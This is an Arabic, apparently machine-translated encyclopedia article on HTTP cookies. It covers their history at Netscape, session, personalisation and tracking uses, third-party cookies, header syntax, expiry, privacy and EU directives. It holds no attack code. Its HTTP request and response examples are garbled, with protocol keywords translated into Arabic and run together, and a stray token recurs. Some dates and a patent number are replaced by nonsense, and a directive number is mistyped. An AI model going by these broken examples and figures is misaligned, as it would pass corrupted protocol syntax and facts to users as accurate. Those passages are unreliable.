in التعاريف, ويكي

ملف تعريف ارتباط الإنترنت: ما هو؟ التعريف والأصول والأنواع والخصوصية

ما هو دور ملف تعريف الارتباط ، ما هو وما هي أنواع ملفات تعريف الارتباط؟ 🍪

56.3k المشاهدات 384 الأصوات

ملف تعريف ارتباط الإنترنت: ما هو؟ التعريف والأصول والأنواع والخصوصية
ملف تعريف ارتباط الإنترنت: ما هو؟ التعريف والأصول والأنواع والخصوصية

Un ملف تعريف الارتباط أو ملف تعريف ارتباط الويب (أو بسكويت، والمختصرة كـ الشاهد في Quebec) بواسطة بروتوكول اتصال HTTP على أنه سلسلة من المعلومات التي يرسلها خادم HTTP إلى عميل HTTP ، والذي يقوم الأخير بإرجاعه في كل مرة يتم فيها الاستعلام عن نفس خادم HTTP في ظل ظروف معينة.

ملف تعريف الارتباط هو ما يعادل أ ملف نصي صغير مخزن على الجهاز لمستخدم الإنترنت. موجودة منذ أكثر من 20 عامًا ، فهي تسمح لمطوري مواقع الويب بتخزين بيانات المستخدم من أجل تسهيل التنقل والسماح بوظائف معينة. لطالما كانت ملفات تعريف الارتباط أكثر أو أقل إثارة للجدل لأنها تحتوي على معلومات شخصية متبقية يمكن استغلالها من قبل أطراف ثالثة.

يتم إرساله كرأس HTTP بواسطة خادم الويب إلى متصفح الويب الذي يعيده دون تغيير في كل مرة يصل فيها إلى الخادم. يمكن استخدام ملف تعريف الارتباط ل مصادقة, جلسة (صيانة الدولة) ، و تخزين معلومات محددة عن المستخدم، مثل تفضيلات الموقع أو محتويات عربة التسوق الإلكترونية. مصطلح ملف تعريف الارتباط مشتق من ملف تعريف الارتباط السحري، وهو مفهوم معروف في حوسبة UNIX ، والذي ألهم فكرة واسم ملفات تعريف الارتباط للمتصفح. توجد بعض البدائل لملفات تعريف الارتباط ، ولكل منها استخداماتها ومزاياها وعيوبها.

كونها ملفات نصية بسيطة ، فإن ملفات تعريف الارتباط ليست قابلة للتنفيذ. هم ليسوا لا برامج التجسس ولا الفيروسات، على الرغم من اكتشاف ملفات تعريف الارتباط من بعض المواقع بواسطة العديد من برامج مكافحة الفيروسات لأنها تسمح بتتبع المستخدمين عند زيارتهم لمواقع متعددة. 

تسمح معظم المتصفحات الحديثة للمستخدمين تقرر قبول أو رفض ملفات تعريف الارتباط. يمكن للمستخدمين أيضًا اختر مدة تخزين ملفات تعريف الارتباط. ومع ذلك ، فإن الرفض الكامل لملفات تعريف الارتباط يجعل بعض المواقع غير قابلة للاستخدام. على سبيل المثال ، قم بتخزين عربات التسوق أو المواقع التي تتطلب تسجيل الدخول باستخدام بيانات الاعتماد (اسم المستخدم وكلمة المرور).

محتويات

تاريخنا

على المدى كوكي مشتق من المصطلح الإنجليزي ملف تعريف الارتباط السحري، وهي حزمة بيانات يتلقاها البرنامج ويعيدها دون تغيير. تم استخدام ملفات تعريف الارتباط بالفعل في تكنولوجيا المعلومات عندما لو مونتولي كان لديه فكرة لاستخدامها في اتصالات الويب في يونيو شنومكس. في ذلك الوقت ، كان يعمل في شركة Netscape Communications ، التي طورت تطبيقًا للتجارة الإلكترونية لأحد العملاء. أعطت ملفات تعريف الارتباط حلاً لمشكلة موثوقية تنفيذ عربة التسوق الافتراضية في المتجر.

كتب John Giannandrea و Lou Montulli أول مواصفات ملفات تعريف الارتباط لـ Netscape في نفس العام. الإصدار 0.9 بيتا من Mosaic Netscape ، صدر في 13 أكتوبر 1994 ، متكامل تكنولوجيا ملفات تعريف الارتباط (انظر آخر). كان أول استخدام (غير تجريبي) لملفات تعريف الارتباط هو تحديد ما إذا كان زوار موقع Netscape الإلكتروني قد زاروا الموقع من قبل. قدم مونتولي طلب براءة اختراع لتكنولوجيا ملفات تعريف الارتباط في عام 1995 ، ومنحت براءة الاختراع الأمريكية 5774670،XNUMX،XNUMX. مُنحت في عام 1998.

بعد تطبيقه في Netscape 0.9 beta في عام 1994 ، تم دمج ملفات تعريف الارتباط في Internet Explorer 2 ، الذي تم إصداره في أكتوبر 1995.

لم يتم حتى الآن معرفة إدخال ملفات تعريف الارتباط على نطاق واسع للجمهور. على وجه الخصوص ، تم قبول ملفات تعريف الارتباط افتراضيًا في إعدادات المتصفح ، ولم يتم إبلاغ المستخدمين بوجودها. كان بعض الأشخاص على دراية بوجود ملفات تعريف الارتباط في الربع الأول من عام 1995 تقريبًا ، لكن عامة الناس لم يتوصلوا إلى وجودها إلا بعد أن نشرت صحيفة فاينانشيال تايمز مقالًا في 12 فبراير 1996. وفي نفس العام ، حظيت ملفات تعريف الارتباط بالكثير من اهتمام وسائل الإعلام بسبب الاختراقات المحتملة على الخصوصية. تمت مناقشة موضوع ملفات تعريف الارتباط في مشاورتين للجنة التجارة الفيدرالية الأمريكية في عامي 1996 و 1997.

كان تطوير مواصفات ملفات تعريف الارتباط الرسمية قيد التنفيذ بالفعل. جرت أولى المناقشات حول المواصفات الرسمية في أبريل 1995 على القائمة البريدية لشبكة الاتصالات العالمية (www-talk). تم تشكيل مجموعة عمل خاصة لـ IETF. اقترح بريان بهليندورف وديفيد كريستول مقترحين بديلين لإدخال حالة إلى معاملات HTTP على التوالي ، لكن المجموعة ، بقيادة كريستول نفسه ، قررت استخدام مواصفات Netscape كنقطة انطلاق. في فبراير 1996 ، قررت مجموعة العمل أن ملفات تعريف ارتباط الطرف الثالث تشكل تهديدًا كبيرًا للخصوصية. تم نشر المواصفات التي أصدرتها المجموعة في النهاية باسم RFC 2109.

منذ نهاية عام 2014 ، نرى لافتة حول ملفات تعريف الارتباط في العديد من المواقع. يوجد ملحق متصفح واحد على الأقل يسمح بامتداد لافتة غير معروضة.

أنواع ملفات تعريف الارتباط والاستخدامات

إدارة الجلسة

يمكن استخدام ملفات تعريف الارتباط للحفاظ على بيانات المستخدم أثناء التنقل ، ولكن أيضًا عبر زيارات متعددة. تم تقديم ملفات تعريف الارتباط لتوفير وسيلة لتنفيذ عربات التسوق الإلكترونية ، وهي جهاز افتراضي يمكن للمستخدم من خلاله تجميع العناصر التي يريد شراءها أثناء تصفح الموقع.

في هذه الأيام ، تقوم تطبيقات مثل عربات التسوق بدلاً من ذلك بتخزين قائمة العناصر في قاعدة بيانات على الخادم ، وهو الأفضل ؛ من حفظها في ملف تعريف الارتباط نفسه. يرسل خادم الويب ملف تعريف ارتباط يحتوي على معرف جلسة فريد. يقوم مستعرض الويب بعد ذلك بإرجاع معرف الجلسة هذا في كل طلب لاحق ويتم حفظ العناصر الموجودة في السلة وربطها بمعرف الجلسة الفريد هذا.

الاستخدام المتكرر لملفات تعريف الارتباط مفيد لتسجيل الدخول إلى موقع باستخدام بيانات الاعتماد. باختصار ، يرسل خادم الويب أولاً ملف تعريف ارتباط يحتوي على معرف جلسة فريد. ثم يقدم المستخدمون بيانات اعتمادهم (عادةً اسم مستخدم وكلمة مرور). يقوم تطبيق الويب بعد ذلك بمصادقة الجلسة ويسمح للمستخدم بالوصول إلى الخدمة.

التخصيص

يمكن استخدام ملفات تعريف الارتباط لتذكر معلومات حول مستخدم الموقع ، من أجل إظهار المحتوى المناسب له في المستقبل. على سبيل المثال ، يمكن لخادم الويب إرسال ملف تعريف ارتباط يحتوي على آخر اسم مستخدم مستخدم لتسجيل الدخول إلى موقع الويب هذا ، بحيث يمكن ملء اسم المستخدم مسبقًا في الزيارات المستقبلية.

تستخدم العديد من مواقع الويب ملفات تعريف الارتباط للتخصيص بناءً على تفضيلات المستخدم. يختار المستخدمون تفضيلاتهم في نموذج وإرسالها إلى الخادم. يقوم الخادم بترميز التفضيلات في ملف تعريف الارتباط وإرسالها مرة أخرى إلى المتصفح. بعد ذلك ، في كل مرة يصل فيها المستخدم إلى صفحة من هذا الموقع ، يقوم المتصفح بإرجاع ملف تعريف الارتباط وبالتالي قائمة التفضيلات ؛ يمكن للخادم بعد ذلك تخصيص الصفحة وفقًا لتفضيلات المستخدم. على سبيل المثال ، يسمح موقع Wikipedia لمستخدميه باختيار شكل الموقع الذي يفضلونه. يسمح محرك بحث Google لمستخدميه (حتى إذا لم يكونوا مسجلين) باختيار عدد النتائج التي يريدون رؤيتها في كل صفحة نتائج.

تتبع

تُستخدم ملفات تعريف الارتباط للتتبع لتتبع عادات تصفح مستخدمي الإنترنت. يمكن أيضًا القيام بذلك جزئيًا باستخدام عنوان IP الخاص بالكمبيوتر لتقديم طلب لصفحة أو باستخدام رأس HTTP "المُحيل" الذي يرسله العميل مع كل طلب ، لكن ملفات تعريف الارتباط تسمح بمزيد من الدقة. يمكن القيام بذلك كما في المثال التالي:

  1. إذا قام المستخدم باستدعاء صفحة على أحد المواقع ، ولم يكن الطلب يحتوي على ملف تعريف ارتباط ، يفترض الخادم أن هذه هي الصفحة الأولى التي يزورها المستخدم. يقوم الخادم بعد ذلك بإنشاء سلسلة عشوائية وإرسالها إلى المتصفح مع الصفحة المطلوبة.
  2. من هذه اللحظة ، سيتم إرسال ملف تعريف الارتباط تلقائيًا بواسطة المتصفح في كل مرة يتم فيها استدعاء صفحة جديدة من الموقع. سيرسل الخادم الصفحة كالمعتاد ، ولكنه سيسجل أيضًا عنوان URL للصفحة التي تسمى وتاريخ الطلب ووقته وملف تعريف الارتباط في ملف السجل.

من خلال النظر في ملف السجل ، يمكن بعد ذلك معرفة الصفحات التي زارها المستخدم وبأي ترتيب. على سبيل المثال ، إذا كان الملف يحتوي على عدد قليل من الطلبات التي تم إجراؤها باستخدام ملف تعريف الارتباط id = abc ، فقد يثبت هذا أن جميع هذه الطلبات تأتي من نفس المستخدم. عنوان URL المطلوب ، يسمح التاريخ والوقت المرتبط بالطلبات بتتبع تصفح المستخدم.

بالإضافة إلى ذلك ، تتيح ملفات تعريف الارتباط وإشارات الويب التابعة لجهات خارجية ، الموضحة أدناه ، إمكانية التتبع عبر مواقع مختلفة. يستخدم تتبع الموقع الفردي عمومًا لأغراض إحصائية. في المقابل ، يتم استخدام التتبع عبر المواقع المختلفة باستخدام ملفات تعريف الارتباط الخاصة بطرف ثالث بشكل عام من قبل شركات الإعلان لإنتاج ملفات تعريف مستخدم مجهولة (والتي تُستخدم بعد ذلك لتحديد الإعلانات التي يجب عرضها على المستخدم وكذلك لإرسال رسائل بريد إلكتروني تتوافق مع هذه الإعلانات - الرسائل الاقتحامية (SPAM)) ).

يُعد تتبع ملفات تعريف الارتباط خطرًا على انتهاك خصوصية المستخدم ولكن يمكن حذفها بسهولة. تتضمن معظم المتصفحات الحديثة خيارًا لحذف ملفات تعريف الارتباط الدائمة تلقائيًا عند إغلاق التطبيق.

ملفات تعريف ارتباط الطرف الثالث

قد توجد الصور والكائنات الأخرى الموجودة في صفحة الويب على خوادم مختلفة عن تلك التي تستضيف الصفحة. لعرض الصفحة ، يقوم المتصفح بتنزيل كل هذه الكائنات. تحتوي معظم مواقع الويب على معلومات من مصادر مختلفة. على سبيل المثال ، إذا قمت بكتابة www.example.com في متصفحك ، فغالبًا ما تكون هناك كائنات أو إعلانات على جزء من الصفحة تأتي من مصادر مختلفة ، أي من مجال مختلف عن www .example.com. ملفات تعريف ارتباط الطرف "الأول" هي ملفات تعريف ارتباط تم تعيينها بواسطة المجال المدرج في شريط عنوان المتصفح. يتم تعيين ملفات تعريف الارتباط للجهات الخارجية بواسطة أحد كائنات الصفحة التي تأتي من مجال مختلف.

بشكل افتراضي ، تقبل المتصفحات مثل Mozilla Firefox و Microsoft Internet Explorer و Opera ملفات تعريف ارتباط الطرف الثالث ، ولكن يمكن للمستخدمين تغيير الإعدادات في خيارات المتصفح لحظرهم. لا توجد مخاطر أمنية كامنة في ملفات تعريف الارتباط للجهات الخارجية التي تمكّن وظائف الويب ، ولكنها تُستخدم أيضًا لتتبع المستخدمين. من موقع إلى آخر.

يمكن لأدوات مثل Ghostery المتوفرة لجميع المتصفحات بما في ذلك Google Chrome حظر عمليات التبادل بين الأطراف الثالثة.

التنفيذ

تفاعل محتمل بين مستعرض الويب والخادم الذي يستضيف صفحة الويب. يرسل الخادم ملف تعريف ارتباط إلى المتصفح ويرسله المتصفح مرة أخرى عندما يتصل بصفحة أخرى.
تفاعل محتمل بين مستعرض الويب والخادم الذي يستضيف صفحة الويب. يرسل الخادم ملف تعريف ارتباط إلى المتصفح ويرسله المتصفح مرة أخرى عندما يتصل بصفحة أخرى.

ملفات تعريف الارتباط هي أجزاء صغيرة من البيانات يرسلها خادم الويب إلى المتصفح. يعيدها المستعرض إلى الخادم دون تغيير ، مقدمًا الحالة (ذاكرة الأحداث الماضية) في معاملة HTTP عديمة الحالة. بدون ملفات تعريف الارتباط ، يعتبر كل استرداد لصفحة ويب أو مكون من صفحة ويب حدثًا منفردًا ، ومستقلًا عن الطلبات الأخرى المقدمة إلى نفس الموقع. بالإضافة إلى إمكانية تعيينها بواسطة خادم الويب ، يمكن أيضًا تعيين ملفات تعريف الارتباط من خلال لغات البرمجة النصية مثل JavaScript ، إذا كان مدعومًا ومصرحًا به من قبل المتصفح.

تقترح مواصفات ملفات تعريف الارتباط الرسمية أن المتصفحات يجب أن تكون قادرة على حفظ وإعادة إرسال الحد الأدنى من ملفات تعريف الارتباط. على وجه التحديد ، يجب أن يكون المتصفح قادرًا على تخزين 300 ملف تعريف ارتباط على الأقل كل منها أربعة كيلوبايت ، و 20 ملف تعريف ارتباط على الأقل لخادم أو مجال واحد.

وفقًا للقسم 3.1 من RFC 2965، أسماء ملفات تعريف الارتباط غير حساسة لحالة الأحرف.

يمكن لملف تعريف الارتباط تحديد تاريخ انتهاء صلاحيته ، وفي هذه الحالة سيتم حذف ملف تعريف الارتباط في هذا التاريخ. إذا لم يحدد ملف تعريف الارتباط تاريخ انتهاء الصلاحية ، فسيتم حذف ملف تعريف الارتباط بمجرد مغادرة المستخدم لمتصفحه. لذلك ، فإن تحديد تاريخ انتهاء الصلاحية هو وسيلة لجعل ملف تعريف الارتباط يعمل خلال جلسات متعددة. لهذا السبب ، يُقال إن ملفات تعريف الارتباط مع تاريخ انتهاء الصلاحية مستمر. تطبيق مثال: قد يستخدم موقع البيع بالتجزئة ملفات تعريف الارتباط الدائمة لتسجيل العناصر التي وضعها المستخدمون في عربة التسوق الخاصة بهم (في الواقع ، قد يشير ملف تعريف الارتباط إلى إدخال محفوظ في قاعدة بيانات على موقع البيع ، وليس في جهاز الكمبيوتر الخاص بك) . من خلال هذا يعني ، إذا غادر المستخدمون متصفحهم دون إجراء عملية شراء وعادوا إليه لاحقًا ، فسيكون بإمكانهم العثور على العناصر في سلة التسوق مرة أخرى. إذا لم تقدم ملفات تعريف الارتباط هذه تاريخ انتهاء الصلاحية ، فستنتهي صلاحيتها عند إغلاق المتصفح ، وستفقد المعلومات الموجودة على محتويات السلة.

يمكن أن يقتصر نطاق ملفات تعريف الارتباط على مجال أو مجال فرعي أو مسار معين على الخادم الذي أنشأها.

يتم نقل صفحات الويب باستخدام بروتوكول نقل النص التشعبي (HTTP). من خلال تجاهل ملفات تعريف الارتباط ، تستدعي المتصفحات صفحة من خوادم الويب عن طريق إرسال نص قصير إليها بشكل عام يسمى طلب HTTP. على سبيل المثال ، للوصول إلى الصفحة www.example.org/index.html ، تتصل المتصفحات بالخادم www.example.org وترسل طلبًا يشبه هذا:

احصل على /index.html HTTP / 1.1 المضيف: www.example.org
ملاحالخادم

يستجيب الخادم بإرسال الصفحة المطلوبة ، مسبوقًا بنص مشابه ، يتم استدعاء الكل استجابة HTTP. قد تحتوي هذه الحزمة على سطور ترشد المتصفح لتخزين ملفات تعريف الارتباط:

HTTP / 1.1 200 موافق نوع المحتوى: نص / html مجموعة-ملف تعريف الارتباط: الاسم = القيمة
(صفحة HTML)
ملاحالخادم

يرسل الخادم سطر Set-Cookie فقط ، إذا أراد الخادم أن يقوم المتصفح بتخزين ملف تعريف ارتباط. Set-Cookie هو طلب للمتصفح لتخزين الاسم = سلسلة القيمة وإعادته في جميع الطلبات المستقبلية إلى الخادم. إذا كان المتصفح يدعم ملفات تعريف الارتباط وتم تمكين ملفات تعريف الارتباط في خيارات المتصفح ، فسيتم تضمين ملف تعريف الارتباط في جميع الطلبات اللاحقة المقدمة إلى نفس الخادم. على سبيل المثال ، يتصل المتصفح بالصفحة www.example.org/news.html عن طريق إرسال الطلب التالي إلى الخادم www.example.org:

احصل على /news.html HTTP / 1.1 المضيف: www.example.org ملف تعريف الارتباط: name = valueAccept: * / *
ملاحالخادم

هذا طلب لصفحة أخرى من نفس الخادم ، ويختلف عن الأول أعلاه لأنه يحتوي على سلسلة أرسلها الخادم مسبقًا إلى المتصفح. بفضل هذه الوسائل ، يعرف الخادم أن هذا الطلب مرتبط بالسابق. يستجيب الخادم عن طريق إرسال الصفحة المطلوبة وأيضًا بإضافة ملفات تعريف ارتباط أخرى إليها.

يمكن للخادم تغيير قيمة ملف تعريف الارتباط عن طريق إرسال سطر جديد Set-Cookie: name = new_value ردًا على الصفحة التي تم استدعاؤها. ثم يستبدل المتصفح القيمة القديمة بالقيمة الجديدة.

عادةً ما يتم إنشاء خط Set-Cookie بواسطة برنامج CGI أو لغة برمجة نصية أخرى ، وليس بواسطة خادم HTTP. سيقوم خادم HTTP (على سبيل المثال: Apache) بنقل نتيجة البرنامج فقط (مستند مسبوق برأس يحتوي على ملفات تعريف الارتباط) إلى المتصفح.

يمكن أيضًا تعيين ملفات تعريف الارتباط بواسطة JavaScript أو لغات أخرى مماثلة تعمل في المتصفح ، أي على جانب العميل بدلاً من جانب الخادم. في JavaScript ، يتم استخدام كائن document.cookie لهذا الغرض. على سبيل المثال ، ينشئ البيان document.cookie = "temperature = 20" ملف تعريف ارتباط باسم "temperature" وقيمة 20.

مثال على استجابة HTTP من google.com ، والتي تعين ملف تعريف ارتباط بالسمات.
مثال على استجابة HTTP من google.com ، والتي تعين ملف تعريف ارتباط بالسمات.

بالإضافة إلى زوج الاسم / القيمة ، يمكن أن يحتوي ملف تعريف الارتباط أيضًا على تاريخ انتهاء الصلاحية والمسار واسم المجال ونوع الاتصال المقصود ، أي عادي أو مشفر. يحدد RFC 2965 أيضًا أن ملفات تعريف الارتباط يجب أن يكون لها رقم إصدار إلزامي ، ولكن يتم حذف هذا بشكل عام. تتبع أجزاء البيانات هذه الاسم = new_value pair ويتم فصلها بفواصل منقوطة. على سبيل المثال ، يمكن إنشاء ملف تعريف ارتباط بواسطة الخادم عن طريق إرسال سطر Set-Cookie: name = new_value؛ تنتهي = التاريخ ؛ المسار = / ؛ المجال = .example.org.

تنتهي صلاحية ملفات تعريف الارتباط ولا يرسلها المتصفح بعد ذلك إلى الخادم في الحالات التالية:

  • عند إغلاق المتصفح ، إذا لم يكن ملف تعريف الارتباط ثابتًا.
  • عندما يمر تاريخ انتهاء صلاحية ملف تعريف الارتباط.
  • عندما يتم تغيير تاريخ انتهاء صلاحية ملف تعريف الارتباط (بواسطة الخادم أو البرنامج النصي) إلى تاريخ في الماضي.
  • عندما يقوم المتصفح بحذف ملف تعريف الارتباط بناءً على طلب المستخدم.

يسمح الموقف الثالث للخوادم أو البرامج النصية بحذف ملف تعريف الارتباط بشكل صريح. لاحظ أنه من الممكن باستخدام متصفح الويب Google Chrome معرفة تاريخ انتهاء صلاحية ملف تعريف ارتباط معين عن طريق الوصول إلى إعدادات المحتوى. قد يظل ملف تعريف الارتباط المحفوظ على جهاز الكمبيوتر موجودًا لعدة عقود إذا لم يتم اتخاذ إجراء لمحوه.

وصلت الفكرة

منذ تقديمها على الإنترنت ، تم تداول العديد من الأفكار حول ملفات تعريف الارتباط على الإنترنت وفي وسائل الإعلام. في عام 1998 ، قرر CIAC ، وهو فريق مراقبة حوادث الكمبيوتر التابع لوزارة الطاقة الأمريكية ، أن الثغرات الأمنية لملفات تعريف الارتباط "غير موجودة أساسًا" وأوضح أن "المعلومات المتعلقة بأصل زياراتك وتفاصيل صفحات الويب التي قمت بزيارتها موجودة بالفعل في ملفات السجل لخوادم الويب ". في عام 2005 ، نشرت Jupiter Research نتائج دراسة ، حيث اعتبرت نسبة كبيرة من المستجيبين العبارات التالية:

  • تشبه ملفات تعريف الارتباط فيروس، فإنها تصيب محركات الأقراص الثابتة للمستخدمين.
  • إنشاء ملفات تعريف الارتباط المنبثقة.
  • تستخدم ملفات تعريف الارتباط للإرسال البريد المزعج.
  • تستخدم ملفات تعريف الارتباط للإعلان فقط.

لا يمكن لملفات تعريف الارتباط محو أو قراءة المعلومات من كمبيوتر المستخدم. ومع ذلك ، فإن ملفات تعريف الارتباط تجعل من الممكن اكتشاف صفحات الويب التي يزورها المستخدم على موقع معين أو مجموعة من المواقع. يمكن جمع هذه المعلومات في ملف تعريف مستخدم يمكن استخدامه أو إعادة بيعه لأطراف ثالثة ، مما قد يؤدي إلى مشاكل خصوصية خطيرة. بعض الملفات الشخصية مجهولة ، بمعنى أنها لا تحتوي على معلومات شخصية ، ولكن حتى هذه الملفات الشخصية يمكن أن تكون موضع شك.

وفقًا لنفس الدراسة ، فإن نسبة كبيرة من مستخدمي الإنترنت لا يعرفون كيفية حذف ملفات تعريف الارتباط. أحد أسباب عدم ثقة الأشخاص في ملفات تعريف الارتباط هو أن بعض المواقع أساءت استخدام جانب التعريف الشخصي لملفات تعريف الارتباط وشاركت هذه المعلومات مع مصادر أخرى. تأتي نسبة كبيرة من الإعلانات المستهدفة والبريد الإلكتروني غير المرغوب فيه ، والتي تعتبر بريدًا عشوائيًا ، من المعلومات المستقاة من ملفات تعريف الارتباط للتتبع.

اعدادات المتصفح

تدعم معظم المتصفحات ملفات تعريف الارتباط وتسمح للمستخدم بتعطيلها. الخيارات الأكثر شيوعًا هي:

  • تمكين أو تعطيل ملفات تعريف الارتباط تمامًا ، بحيث يتم قبولها أو حظرها باستمرار.
  • اسمح للمستخدم بمشاهدة ملفات تعريف الارتباط النشطة في صفحة معينة ، عن طريق إدخال javascript: alert (document.cookie) في شريط عنوان المتصفح. تتضمن بعض المتصفحات مدير ملفات تعريف الارتباط للمستخدم الذي يمكنه عرض ملفات تعريف الارتباط المخزنة حاليًا بواسطة المتصفح وحذفها بشكل انتقائي.

تسمح معظم المتصفحات أيضًا بالحذف الكامل للبيانات الشخصية التي تتضمن ملفات تعريف الارتباط. توجد أيضًا وحدات إضافية للتحكم في أذونات ملفات تعريف الارتباط.

الخصوصية وملفات تعريف الارتباط للجهات الخارجية

في هذا المثال الوهمي ، قامت شركة إعلانات بوضع لافتات على موقعين إلكترونيين. من خلال استضافة اللافتات على خوادمها واستخدام ملفات تعريف ارتباط الطرف الثالث ، تستطيع الشركة الإعلانية تتبع تنقل المستخدم عبر هذين الموقعين.

ملفات تعريف الارتباط لها آثار مهمة على خصوصية مستخدمي الويب وإخفاء هويتهم. على الرغم من أن ملفات تعريف الارتباط لا يتم إرسالها إلا مرة أخرى إلى الخادم الذي قام بتعيينها أو إلى خادم ينتمي إلى نفس مجال الإنترنت ، إلا أن صفحة الويب قد تحتوي على صور أو مكونات أخرى مخزنة على خوادم تنتمي إلى مجالات أخرى. يتم استدعاء ملفات تعريف الارتباط التي تم تعيينها أثناء استرداد هذه المكونات الخارجية ملفات تعريف ارتباط الطرف الثالث. يتضمن هذا ملفات تعريف الارتباط من النوافذ المنبثقة غير المرغوب فيها.

تستخدم شركات الإعلان ملفات تعريف الارتباط الخاصة بطرف ثالث لتتبع المستخدمين عبر المواقع المختلفة التي يزورونها. على وجه الخصوص ، يمكن لشركة الإعلان تتبع المستخدم عبر جميع الصفحات التي وضعت فيها صورًا إعلانية أو بكسل تتبع. تتيح معرفة الصفحات التي يزورها المستخدم لشركة الإعلان استهداف التفضيلات الإعلانية للمستخدم.

يعتبر البعض القدرة على إنشاء ملف تعريف مستخدم بمثابة انتهاك للخصوصية ، خاصةً عند إجراء التتبع عبر نطاقات مختلفة باستخدام ملفات تعريف ارتباط الطرف الثالث. لهذا السبب ، لدى بعض البلدان تشريعات خاصة بملفات تعريف الارتباط.

طبقت حكومة الولايات المتحدة قواعد صارمة بشأن وضع ملفات تعريف الارتباط في عام 2000 ، بعد أن تم الكشف عن أن مكتب سياسة الأدوية بالبيت الأبيض كان يستخدم ملفات تعريف الارتباط لتتبع أجهزة الكمبيوتر الخاصة بالمستخدمين الذين يشاهدون إعلانات المخدرات عبر الإنترنت. في عام 2002 ، اكتشف الناشط المتعلق بالخصوصية دانييل برانت أن وكالة المخابرات المركزية تركت ملفات تعريف ارتباط دائمة على أجهزة الكمبيوتر التي زارت مواقعها على شبكة الإنترنت. بمجرد إبلاغها بهذا الانتهاك ، أعلنت وكالة المخابرات المركزية أن ملفات تعريف الارتباط هذه لم يتم إرسالها عن قصد وتوقفت عن وضعها. في 25 ديسمبر 2005 ، اكتشف براندت أن وكالة الأمن القومي (NSA) تركت ملفي تعريف ارتباط دائمين على أجهزة كمبيوتر الزوار بسبب تحديث البرنامج. بعد أن تم إخطارها ، قامت وكالة الأمن القومي على الفور بتعطيل ملفات تعريف الارتباط.

في المملكة المتحدة ، قانون ملفات تعريف الارتباط "، الذي دخل حيز التنفيذ في 25 مايو 2012 ، يُلزم المواقع بالإعلان عن نواياها ، وبالتالي السماح للمستخدمين باختيار ما إذا كانوا يريدون ترك آثار مرورهم على الإنترنت أم لا. وبالتالي يمكن حمايتهم من استهداف الإعلانات. لكن، بالنسبة الى The Guardian ، موافقة مستخدمي الإنترنت ليست صريحة بالضرورة ؛ تم إجراء تغييرات على شروط موافقة المستخدم ، مما يجعلها وبالتالي ضمنيًا.

التوجيه 2002/58 بشأن الخصوصية

يحتوي التوجيه 202/58 الخاص بالخصوصية والاتصالات الإلكترونية على قواعد بشأن استخدام ملفات تعريف الارتباط. على وجه الخصوص ، تتطلب الفقرة 5 من المادة 3 من هذا التوجيه أنه لا يمكن تخزين البيانات (مثل ملفات تعريف الارتباط) في كمبيوتر المستخدم إلا إذا:

  • يتم إبلاغ المستخدم بكيفية استخدام البيانات ؛
  • يُمنح المستخدم خيار رفض عملية التخزين هذه. ومع ذلك ، تنص هذه المادة أيضًا على أن تخزين البيانات لأسباب فنية مستثناة من هذا القانون.

من المقرر أن يتم تنفيذ التوجيه اعتبارًا من أكتوبر 2003 ، إلا أنه تم تطبيق التوجيه بشكل غير كامل للغاية وفقًا لتقرير صدر في ديسمبر 2004 ، والذي أشار أيضًا إلى أن بعض الدول الأعضاء (سلوفاكيا ولاتفيا واليونان وبلجيكا ولوكسمبورغ) لم تقم بعد بتحويل التوجيه في القانون المحلي.

وفقًا لرأي G29 في عام 2010 ، لا يزال تطبيق هذا التوجيه ، الذي يشترط بشكل خاص استخدام ملفات تعريف الارتباط لأغراض الدعاية السلوكية ، بناءً على موافقة صريحة من مستخدم الإنترنت ، ضعيفًا للغاية. في الواقع ، تقوم معظم المواقع بذلك بطريقة لا تمتثل للتوجيه ، من خلال قصر نفسها على "لافتة" بسيطة تبلغ عن استخدام "ملفات تعريف الارتباط" دون إعطاء معلومات عن الاستخدامات ، دون التفريق بين ملفات تعريف الارتباط "التقنية". ملفات تعريف الارتباط "للتتبع" ، ولا لتقديم خيار حقيقي للمستخدم الذي يرغب في الاحتفاظ بملفات تعريف الارتباط التقنية (مثل ملفات تعريف الارتباط لإدارة عربة التسوق) ورفض ملفات تعريف الارتباط "للتتبع". في الواقع ، لا تعمل العديد من المواقع بشكل صحيح إذا تم رفض ملفات تعريف الارتباط ، وهو ما لا يتوافق مع التوجيه 2002/58 أو التوجيه 95/46 (حماية البيانات الشخصية).

التوجيه 2009 / 136 / CE

تم تحديث هذه المادة بموجب التوجيه 2009/136 / EC بتاريخ 25 نوفمبر 2009 والذي ينص على أن "تخزين المعلومات ، أو الوصول إلى المعلومات المخزنة بالفعل ، في المعدات الطرفية لمشترك أو مستخدم مسموح به فقط بشرط أن قد أعطى المشترك أو المستخدم موافقته ، بعد تلقيه ، وفقًا للتوجيه 95/46 / EC ، معلومات واضحة وكاملة ، بين الآخرين حول أغراض المعالجة ". وبالتالي فإن التوجيه الجديد يعزز الالتزامات قبل وضع ملفات تعريف الارتباط على كمبيوتر مستخدم الإنترنت.

في الاعتبارات الأولية للتوجيه ، يحدد المشرع الأوروبي ما يلي: "حيثما كان ذلك ممكنًا وفعالًا تقنيًا ، وفقًا للأحكام ذات الصلة من التوجيه 95/46 / EC ، يمكن التعبير عن موافقة المستخدم فيما يتعلق بالمعالجة من خلال استخدام الإعدادات المناسبة لمتصفح أو تطبيق آخر ". ولكن في الواقع ، لا يوجد متصفح حتى الآن يجعل من الممكن فصل ملفات تعريف الارتباط التقنية الأساسية عن الملفات الاختيارية التي يجب تركها لاختيار المستخدم.

تم نقل هذا التوجيه الجديد من قبل النواب البلجيكيين في يوليو 2012. تظهر دراسة عام 2014 أنه حتى النواب يكافحون من أجل التقديم. قيود التوجيه.

P3P

تتضمن مواصفات P3P قدرة الخادم على تحديد سياسة الخصوصية ، والتي تحدد نوع المعلومات التي يجمعها ولأي غرض. تتضمن هذه السياسات (على سبيل المثال لا الحصر) استخدام المعلومات التي تم جمعها باستخدام ملفات تعريف الارتباط. وفقًا لتعريفات P3P ، يمكن للمتصفح قبول ملفات تعريف الارتباط أو رفضها من خلال مقارنة سياسات الخصوصية بتفضيلات المستخدم أو بسؤال المستخدم ، وتقديم بيان خصوصية سياسة الخصوصية المعلن من قبل الخادم.

تدعم العديد من المتصفحات ، بما في ذلك Apple Safari و Microsoft Internet Explorer الإصداران 6 و 7 ، P3P الذي يسمح للمتصفح بتحديد ما إذا كان سيقبل تخزين ملفات تعريف الارتباط من جهة خارجية. يسمح متصفح Opera للمستخدمين برفض ملفات تعريف الارتباط للجهات الخارجية وإنشاء ملف تعريف أمان عالمي ومحدد لنطاقات الإنترنت. أسقط الإصدار 2 من Mozilla Firefox دعم P3P لكنه أعاده إلى الإصدار 3.

